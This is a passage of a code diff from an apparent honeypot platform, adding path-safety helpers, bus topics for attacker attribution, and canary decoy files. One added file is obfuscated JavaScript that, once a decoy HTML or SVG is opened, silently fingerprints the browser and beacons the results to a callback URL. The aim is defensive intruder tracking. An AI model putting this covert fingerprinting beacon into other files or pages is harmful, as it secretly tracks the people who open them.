+    candidate = (root / decky / service / stored_as).resolve()
+    # defence-in-depth: even though the regexes reject `..`, make sure a
+    # symlink or weird filesystem state can't escape the root.
+    if root not in candidate.parents and candidate != root:
+        raise ArtifactPathError("path escapes artifacts root")
+    return candidate
--- a/decnet/artifacts/shards.py
+++ b/decnet/artifacts/shards.py
@@ -0,0 +1,129 @@
+"""Shared asciinema shard helpers.
+
+Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
+so non-router callers (the BEHAVE-SHELL session-ended handler in
+``decnet/profiler/worker.py``, the collector's session aggregator)
+can resolve shard paths without crossing the layer boundary into the
+FastAPI router.
+
+Functions here speak in :class:`ValueError` — callers that want HTTP
+semantics translate at the boundary. The router wrappers keep their
+existing ``HTTPException`` behaviour for backwards compatibility.
+
+PII boundary unchanged: shards live on disk; this module returns
+:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
+cache stores byte offsets only.
+"""
+from __future__ import annotations
+
+import os
+import re
+from collections import OrderedDict
+from pathlib import Path
+
+ARTIFACTS_ROOT = Path(
+    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
+)
+
+_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
+_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
+_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
+_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
+
+# (path, mtime_ns) → {sid: [(offset, length), ...]}
+_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
+    OrderedDict()
+)
+_CACHE_MAX = 32
+
+
+def validate_names(decky: str, service: str) -> None:
+    """Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
+    if not _DECKY_RE.fullmatch(decky):
+        raise ValueError(f"invalid decky name: {decky!r}")
+    if not _SERVICE_RE.fullmatch(service):
+        raise ValueError(f"invalid service: {service!r}")
+
+
+def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
+    """Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
+    with escape-attempt detection. Raises :class:`ValueError` on
+    invalid inputs.
+    """
+    validate_names(decky, service)
+    if not _SHARD_BASENAME_RE.fullmatch(shard_name):
+        raise ValueError(f"invalid shard name: {shard_name!r}")
+    root = ARTIFACTS_ROOT.resolve()
+    candidate = (root / decky / service / "transcripts" / shard_name).resolve()
+    if root not in candidate.parents and candidate != root:
+        raise ValueError(f"path escapes artifacts root: {candidate}")
+    return candidate
+
+
+def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
+    index: dict[str, list[tuple[int, int]]] = {}
+    with path.open("rb") as f:
+        offset = 0
+        for line in f:
+            length = len(line)
+            m = _SID_LINE_RE.search(line)
+            if m:
+                sid = m.group(1).decode("ascii")
+                index.setdefault(sid, []).append((offset, length))
+            offset += length
+    return index
+
+
+def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
+    """Return ``(sid → [(offset, length), …], file_size)``.
+
+    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
+    """
+    st = path.stat()
+    key = (str(path), st.st_mtime_ns)
+    if key in _INDEX_CACHE:
+        _INDEX_CACHE.move_to_end(key)
+        return _INDEX_CACHE[key], st.st_size
+    index = _build_index(path)
+    _INDEX_CACHE[key] = index
+    _INDEX_CACHE.move_to_end(key)
+    while len(_INDEX_CACHE) > _CACHE_MAX:
+        _INDEX_CACHE.popitem(last=False)
+    return index, st.st_size
+
+
+def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
+    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
+    transcripts dir until one claims this ``sid``.
+
+    Newest shards first — most lookups are for recent sessions. Caches
+    the per-shard sid index, so repeated calls are ~free until the
+    shard's mtime changes.
+
+    Returns ``None`` when nothing claims the sid OR when the
+    transcripts dir is missing / unreadable. Never raises on
+    filesystem-level errors — callers treat ``None`` as "skip".
+    """
+    validate_names(decky, service)
+    root = ARTIFACTS_ROOT.resolve()
+    transcripts_dir = (root / decky / service / "transcripts").resolve()
+    if root not in transcripts_dir.parents:
+        return None
+    try:
+        if not transcripts_dir.is_dir():
+            return None
+        entries = list(transcripts_dir.iterdir())
+    except (OSError, PermissionError):
+        return None
+    shards = sorted(
+        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
+        reverse=True,
+    )
+    for shard in shards:
+        try:
+            index, _size = get_index(shard)
+        except (OSError, PermissionError):
+            continue
+        if sid in index:
+            return shard
+    return None
--- a/decnet/asn/iptoasn/provider.py
+++ b/decnet/asn/iptoasn/provider.py
@@ -13,7 +13,7 @@ from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
-from decnet.asn.lookup import AsnLookup
+from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root

 logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )

-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/bus/factory.py
+++ b/decnet/bus/factory.py
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    up at all we no-op.
    """
    try:
-        from decnet.telemetry import wrap_repository  # type: ignore[attr-defined]
+        from decnet.telemetry import wrap_repository
    except ImportError:
        return bus
    try:
--- a/decnet/bus/publish.py
+++ b/decnet/bus/publish.py
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
    contract the rest of this module already upholds.
    """
    if bus is None:
-        return lambda _topic, _payload, _event_type="": None
+        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]

    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
--- a/decnet/bus/topics.py
+++ b/decnet/bus/topics.py
@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
    attacker.scored
    attacker.session.started
    attacker.session.ended
+    attacker.observation.{primitive}
    identity.formed
    identity.observation.linked
    identity.merged
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
    campaign.unmerged
    credential.captured
    credential.reuse.detected
+    attribution.profile.state_changed
+    attribution.profile.multi_actor_suspected
    canary.{token_id}.triggered
    canary.{token_id}.placed
    canary.{token_id}.revoked
    system.log
    system.bus.health
    system.{worker}.health
+    email.received
+    ttp.tagged
+    ttp.rule.fired.{technique_id}
+    ttp.rule.suppressed

 Wildcards (per :func:`decnet.bus.base.matches`):

@@ -52,8 +59,12 @@ IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
+ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
+SMTP = "smtp"
+EMAIL = "email"
+TTP = "ttp"


 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
+# Per-service add/remove on a deployed decky (live; no full redeploy).
+# Payload carries ``decky_name``, ``service_name``, optional
+# ``topology_id``, and ``services`` (the post-mutation list).  Consumers
+# that watch substrate shape (correlator, dashboard, profiler) reconcile
+# off these without waiting for the next decnet-state.json snapshot.
+DECKY_SERVICE_ADDED = "service_added"
+DECKY_SERVICE_REMOVED = "service_removed"
+# Per-service config change (the schema-driven Inspector form).  Payload
+# carries ``decky_name``, ``service_name``, optional ``topology_id``,
+# ``service_config`` (the new validated dict), and ``recreated`` — true
+# when the operator hit Apply (container was force-recreated to pick up
+# the new env), false when they only hit Save (DB-only).
+DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"

 # Attacker event types (second token under the ``attacker`` root).  First
 # sighting, session boundary transitions, and score-threshold crossings
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 ATTACKER_FINGERPRINTED = "fingerprinted"
+# Published when the prober observes a NEW hash for an
+# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
+# attacker rotated their VPS, rebuilt their SSH server, swapped their
+# TLS cert.  Distinct from ``fingerprinted`` which fires on every probe
+# result; ``fingerprint_rotated`` fires only on diff and carries both
+# old_hash + new_hash.  Producer: prober (via the rotation library);
+# consumers: dashboard, forensics, attribution clustering.
+ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
 # returned a verdict).  Payload carries the aggregate verdict + per-
 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
+# Per-primitive BEHAVE-SHELL observation. Full topic shape:
+#   attacker.observation.<primitive>
+# e.g. ``attacker.observation.motor.input_modality``.  Producer:
+# ``decnet/profiler/behave_shell/`` (extractor library called from the
+# profiler worker on ``attacker.session.ended``); consumers: dashboard
+# SSE relay, attribution engine state machine, federation gossip
+# (post-v0).  See development/BEHAVE-INTEGRATION.md §"Bus topics" for
+# the wire-format contract — the prefix is documentation + pattern
+# match only; bus auth is socket file perms (DEBT-029 §2), not
+# topic-level.  The ``primitive`` segment MAY contain dots
+# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
+# rule that ``attacker.session.ended`` uses.
+ATTACKER_OBSERVATION_PREFIX = "observation"

 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"

+# Attribution-engine event types (second/third tokens under
+# ``attribution``).  Published by the v0 attribution worker
+# (``decnet.correlation.attribution_worker``) which subscribes to
+# ``attacker.observation.>`` and runs the per-(identity, primitive)
+# state machine.  See ``development/ATTRIBUTION-ENGINE.md``.
+#
+#   attribution.profile.state_changed         — per-primitive state
+#                                               transition (e.g.
+#                                               stable → drifting).
+#                                               Payload: identity_uuid,
+#                                               primitive, old_state,
+#                                               new_state, current_value,
+#                                               confidence,
+#                                               observation_count, ts.
+#   attribution.profile.multi_actor_suspected — fires when ≥ 2
+#                                               primitives flag the same
+#                                               identity as multi_actor
+#                                               concurrently. Cross-
+#                                               primitive correlator;
+#                                               single-primitive
+#                                               multi_actor is too noisy
+#                                               on its own. Payload:
+#                                               identity_uuid, primitives,
+#                                               evidence_summary,
+#                                               confidence, ts.
+#
+# These are *derived* signals — distinct from
+# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
+# ``attacker.observation.*`` (raw extractor envelopes,
+# BEHAVE-INTEGRATION.md). The three families compose: observations feed
+# the attribution engine, the engine emits derived state, the clusterer
+# reads observations + state to form / merge identities.
+ATTRIBUTION_PROFILE_PREFIX = "profile"
+ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
+ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
+
 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed     — orchestrator/API successfully planted a
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
 # of patterns. Payload is currently empty; consumers only need the signal.
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"

+# Email-receipt event — fired by smtp / smtp-relay services on full-message
+# receipt (envelope + headers + body + attachments captured). Single-token
+# leaf so the bus tokenizer accepts it directly under the ``email`` root.
+# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
+# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
+# counts, header names, and rcpt-domain sets — never rcpt addresses or body
+# bytes.
+EMAIL_RECEIVED = "received"
+
+# TTP-tagging event types (second/third tokens under ``ttp``).
+#
+#   ttp.tagged                     — one or more new tags written. Published
+#                                    only when ``INSERT OR IGNORE`` wrote at
+#                                    least one new row; idempotent
+#                                    re-evaluations publish nothing
+#                                    (loop-prevention invariant — see
+#                                    TTP_TAGGING.md).
+#   ttp.rule.fired.{technique_id}  — per-technique fan-out for SIEM
+#                                    consumers that subscribe to a single
+#                                    technique. Topic key is the parent
+#                                    technique; sub_technique is in the
+#                                    payload. Built via :func:`ttp_rule_fired`.
+#   ttp.rule.suppressed            — rule fired but the tag was dropped
+#                                    (confidence below floor, rate-limited,
+#                                    or the rule's RuleState was disabled).
+#                                    Observability signal for the dashboard.
+#
+# Per-rule reload + state-change topics. Built via
+# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
+# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
+# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
+TTP_TAGGED = "tagged"
+TTP_RULE_FIRED = "rule.fired"
+TTP_RULE_SUPPRESSED = "rule.suppressed"
+TTP_RULE_RELOADED = "rule.reloaded"
+TTP_RULE_STATE = "rule.state"
+

 # ─── Builders ────────────────────────────────────────────────────────────────

@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
    return f"{ATTACKER}.{event_type}"


+def attacker_observation(primitive: str) -> str:
+    """Build ``attacker.observation.<primitive>``.
+
+    *primitive* is the fully-qualified BEHAVE-SHELL primitive path
+    (e.g. ``motor.input_modality``,
+    ``cognitive.feedback_loop_engagement``,
+    ``motor.shell_mastery.tab_completion``).  Dotted primitives are
+    permitted — this matches the format
+    ``behave_shell.spec.event_adapter.event_topic_for`` produces
+    upstream, and DECNET's bus admits the dotted leaf the same way
+    :func:`attacker` does for ``session.started``.
+
+    Empty string is rejected so a downstream typo doesn't ship as
+    ``attacker.observation.``.
+    """
+    if not primitive:
+        raise ValueError(
+            "attacker_observation topic requires a non-empty primitive",
+        )
+    return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
+
+
+def attribution(event_type: str) -> str:
+    """Build ``attribution.<event_type>``.
+
+    *event_type* is typically one of
+    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
+    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
+    dot (``profile.state_changed``) which is permitted under the same
+    "trailing dotted leaf" rule that ``attacker.session.started`` uses.
+    """
+    if not event_type:
+        raise ValueError("attribution topic requires a non-empty event_type")
+    return f"{ATTRIBUTION}.{event_type}"
+
+
 def campaign(event_type: str) -> str:
    """Build ``campaign.<event_type>``.

@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
    return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"


+def smtp(event_type: str) -> str:
+    """Build ``smtp.<event_type>``.
+
+    *event_type* may contain dots (e.g. ``probe.pending``).
+    """
+    if not event_type:
+        raise ValueError("smtp topic requires a non-empty event_type")
+    return f"{SMTP}.{event_type}"
+
+
+def email_topic(event_type: str) -> str:
+    """Build ``email.<event_type>``.
+
+    Named ``email_topic`` rather than ``email`` to avoid shadowing the
+    Python ``email`` stdlib package at import sites that pull both.
+    *event_type* is typically :data:`EMAIL_RECEIVED`.
+    """
+    if not event_type:
+        raise ValueError("email topic requires a non-empty event_type")
+    return f"{EMAIL}.{event_type}"
+
+
+def ttp(event_type: str) -> str:
+    """Build ``ttp.<event_type>``.
+
+    *event_type* is typically one of :data:`TTP_TAGGED`,
+    :data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
+    leaves (``rule.fired``) are permitted — same rationale as
+    :func:`system`. For per-technique fan-out use
+    :func:`ttp_rule_fired`.
+    """
+    if not event_type:
+        raise ValueError("ttp topic requires a non-empty event_type")
+    return f"{TTP}.{event_type}"
+
+
+def ttp_rule_fired(technique_id: str) -> str:
+    """Build ``ttp.rule.fired.<technique_id>``.
+
+    Per-technique fan-out: SIEM subscribers can listen on
+    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
+    one technique. *technique_id* is validated as a single segment —
+    sub-techniques like ``T1110.001`` are rejected because they would
+    split into two tokens. The topic key is the parent technique;
+    ``sub_technique_id`` lives in the payload.
+    """
+    _reject_tokens(technique_id)
+    return f"{TTP}.rule.fired.{technique_id}"
+
+
+def ttp_rule_reloaded(rule_id: str) -> str:
+    """Build ``ttp.rule.reloaded.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *definition* changes (YAML edit on the filesystem
+    backend, ``ttp_rule`` row update on the database backend). One event
+    per per-rule edit — never batched (the "incremental, never batched"
+    property in TTP_TAGGING.md §"Bus topics" inherits its granularity
+    from :meth:`RuleStore.subscribe_changes`).
+
+    Subscribers: ``ttp.rule.reloaded.>`` for every rule,
+    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
+    single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
+
+
+def ttp_rule_state(rule_id: str) -> str:
+    """Build ``ttp.rule.state.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *operational state* changes (operator hits the disable
+    button, an ``expires_at`` TTL fires and auto-reverts the state).
+    *rule_id* is validated as a single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
+
+
 def _reject_tokens(*parts: str) -> None:
    """Reject topic segments that would break NATS-style tokenization.

--- a/decnet/canary/_obfuscate_helper.js
+++ b/decnet/canary/_obfuscate_helper.js
@@ -0,0 +1,18 @@
+// Node helper invoked by decnet.canary.obfuscator.
+// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
+// Kept dependency-light on purpose: only javascript-obfuscator.
+const JsObf = require('javascript-obfuscator');
+
+let raw = '';
+process.stdin.setEncoding('utf8');
+process.stdin.on('data', (chunk) => { raw += chunk; });
+process.stdin.on('end', () => {
+  try {
+    const { code, options } = JSON.parse(raw);
+    const result = JsObf.obfuscate(code, options || {});
+    process.stdout.write(result.getObfuscatedCode());
+  } catch (e) {
+    process.stderr.write(String(e && e.stack || e));
+    process.exit(2);
+  }
+});
--- a/decnet/canary/base.py
+++ b/decnet/canary/base.py
@@ -100,6 +100,12 @@ class CanaryArtifact:
    planting.  Never leaked to the attacker-facing surface.
    """

+    fingerprint_nonce: Optional[str] = None
+    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
+    else.  Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
+    so the worker can validate incoming ``?k=`` params.
+    """
+

 class CanaryGenerator(ABC):
    """Produces a fake artifact from scratch."""
--- a/decnet/canary/cultivator.py
+++ b/decnet/canary/cultivator.py
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
    ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
    ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
+    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }


@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
    "honeydoc_pdf": "http",
    "ssh_key": "dns",             # trip is DNS resolution of host comment
    "mysql_dump": "dns",          # trip is DNS resolution of subdomain
+    "fingerprint_html": "http",   # obfuscated JS beacons GET /c/<slug>
+    "fingerprint_svg": "http",    # same, embedded inside SVG <script>
 }


@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
    ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
    ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
+    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }


@@ -136,10 +142,12 @@ async def cultivate(
        )

    callback_token = _new_callback_token()
+    http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
+    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
    ctx = CanaryContext(
        callback_token=callback_token,
-        http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
-        dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
+        http_base=http_base_str,
+        dns_zone=dns_zone_str,
        persona="linux",  # all our deckies are POSIX in MVP
    )
    generator = get_generator(gen_name)
@@ -154,7 +162,7 @@ async def cultivate(
    # attribute a callback if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
-    await repo.create_canary_token({
+    token_data: dict = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
@@ -165,7 +173,10 @@ async def cultivate(
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
-    })
+    }
+    if artifact.fingerprint_nonce is not None:
+        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
+    await repo.create_canary_token(token_data)

    # Carry the placement_path on the artifact so the orchestrator's
    # plant_file call uses it.  We don't mutate the generator's
--- a/decnet/canary/dns_server.py
+++ b/decnet/canary/dns_server.py
@@ -131,7 +131,7 @@ def _build_response(
    question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)

    answer = b""
-    if an_count:
+    if an_count and answer_ip is not None:
        # Use a name pointer back to the question (offset 12).
        ptr = struct.pack("!H", 0xC000 | 12)
        rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None

-    def connection_made(self, transport) -> None:  # type: ignore[override]
-        self._transport = transport  # type: ignore[assignment]
+    def connection_made(self, transport) -> None:
+        self._transport = transport

-    def datagram_received(  # type: ignore[override]
+    def datagram_received(
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
            return
        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
-        asyncio.create_task(self._hook(slug, query, addr[0]))
+        asyncio.ensure_future(self._hook(slug, query, addr[0]))

    def _slug_for(self, qname: str) -> Optional[str]:
        if not self._zone or not qname.endswith(self._suffix):
--- a/decnet/canary/factory.py
+++ b/decnet/canary/factory.py
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
+    "fingerprint_html",
+    "fingerprint_svg",
 )

 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
    if name == "mysql_dump":
        from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
        return MySQLDumpGenerator()
+    if name == "fingerprint_html":
+        from decnet.canary.generators.fingerprint_html import (
+            FingerprintHtmlGenerator,
+        )
+        return FingerprintHtmlGenerator()
+    if name == "fingerprint_svg":
+        from decnet.canary.generators.fingerprint_svg import (
+            FingerprintSvgGenerator,
+        )
+        return FingerprintSvgGenerator()
    raise ValueError(
        f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
    )
--- a/decnet/canary/fingerprint_payload.js
+++ b/decnet/canary/fingerprint_payload.js
@@ -0,0 +1,291 @@
+// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
+// canary, harvests browser primitives, and beacons the result back to the
+// canary worker.  Ported from canary-self-test.html with the rendering UI
+// stripped out.
+//
+// Three placeholders are substituted by the Python builder BEFORE
+// javascript-obfuscator runs:
+//
+//   {{BEACON_URL}}  → full URL to /c/<callback_token> (no trailing slash)
+//   {{MINT_UUID}}   → per-mint UUID, baked into the string-array post-obf
+//   {{MINT_NONCE}}  → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
+//
+// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
+// then a fingerprint payload sent as a base64-URL query param on a second
+// GET so the existing worker records the hit even before step-4 POST
+// support lands.  Both fail-open: any error short-circuits to next step.
+
+(async function () {
+  var BEACON_URL = "{{BEACON_URL}}";
+  var MINT_UUID = "{{MINT_UUID}}";
+  var MINT_NONCE = "{{MINT_NONCE}}";
+  var fp = { mint: MINT_UUID };
+
+  function fire(url) {
+    try {
+      var img = new Image();
+      img.src = url;
+    } catch (e) { /* swallow */ }
+  }
+
+  // 1) bare-open beacon — fires regardless of whether the rest succeeds
+  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
+
+  function sha256(str) {
+    var buf = new TextEncoder().encode(str);
+    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
+      return Array.from(new Uint8Array(h))
+        .map(function (b) { return b.toString(16).padStart(2, "0"); })
+        .join("");
+    });
+  }
+
+  // navigator
+  try {
+    fp.nav = {
+      ua: navigator.userAgent,
+      pl: navigator.platform,
+      lg: navigator.language,
+      lgs: (navigator.languages || []).join(","),
+      ck: navigator.cookieEnabled,
+      dnt: navigator.doNotTrack,
+      hc: navigator.hardwareConcurrency,
+      dm: navigator.deviceMemory || null,
+      tp: navigator.maxTouchPoints,
+      wd: navigator.webdriver === true,
+      pdf: navigator.pdfViewerEnabled || null,
+    };
+  } catch (e) { fp.nav = { err: String(e) }; }
+
+  // screen
+  try {
+    fp.scr = {
+      w: screen.width, h: screen.height,
+      aw: screen.availWidth, ah: screen.availHeight,
+      cd: screen.colorDepth, pd: screen.pixelDepth,
+      dpr: window.devicePixelRatio,
+      iw: window.innerWidth, ih: window.innerHeight,
+      or: (screen.orientation && screen.orientation.type) || null,
+    };
+  } catch (e) { fp.scr = { err: String(e) }; }
+
+  // tz / locale
+  try {
+    var dtf = Intl.DateTimeFormat().resolvedOptions();
+    fp.tz = {
+      z: dtf.timeZone, lc: dtf.locale,
+      ca: dtf.calendar, ns: dtf.numberingSystem,
+      off: new Date().getTimezoneOffset(),
+    };
+  } catch (e) { fp.tz = { err: String(e) }; }
+
+  // connection
+  try {
+    var c = navigator.connection;
+    fp.cn = c ? {
+      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
+    } : null;
+  } catch (e) { fp.cn = { err: String(e) }; }
+
+  // canvas
+  try {
+    var cv = document.createElement("canvas");
+    cv.width = 280; cv.height = 60;
+    var ctx = cv.getContext("2d");
+    ctx.textBaseline = "top";
+    ctx.font = "14px Arial";
+    ctx.fillStyle = "#f60";
+    ctx.fillRect(125, 1, 62, 20);
+    ctx.fillStyle = "#069";
+    ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
+    ctx.fillStyle = "rgba(102,204,0,0.7)";
+    ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
+    var dataURL = cv.toDataURL();
+    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
+  } catch (e) { fp.cv = { err: String(e) }; }
+
+  // webgl
+  try {
+    var gc = document.createElement("canvas");
+    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
+    if (gl) {
+      var ext = gl.getExtension("WEBGL_debug_renderer_info");
+      fp.gl = {
+        v: gl.getParameter(gl.VENDOR),
+        r: gl.getParameter(gl.RENDERER),
+        ver: gl.getParameter(gl.VERSION),
+        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
+        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
+        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
+      };
+    } else { fp.gl = { err: "unavailable" }; }
+  } catch (e) { fp.gl = { err: String(e) }; }
+
+  // audio
+  try {
+    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
+    if (ACtx) {
+      var actx = new ACtx(1, 44100, 44100);
+      var osc = actx.createOscillator();
+      var cmp = actx.createDynamicsCompressor();
+      osc.type = "triangle"; osc.frequency.value = 10000;
+      cmp.threshold.value = -50; cmp.knee.value = 40;
+      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
+      osc.connect(cmp); cmp.connect(actx.destination);
+      osc.start(0);
+      var buf = await actx.startRendering();
+      var data = buf.getChannelData(0).slice(4500, 5000);
+      var sum = 0;
+      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
+      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
+    } else { fp.au = { err: "unavailable" }; }
+  } catch (e) { fp.au = { err: String(e) }; }
+
+  // fonts
+  try {
+    var bases = ["monospace", "sans-serif", "serif"];
+    var tests = [
+      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
+      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
+      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
+      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
+      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
+      "San Francisco", "Helvetica Neue", "Lucida Grande",
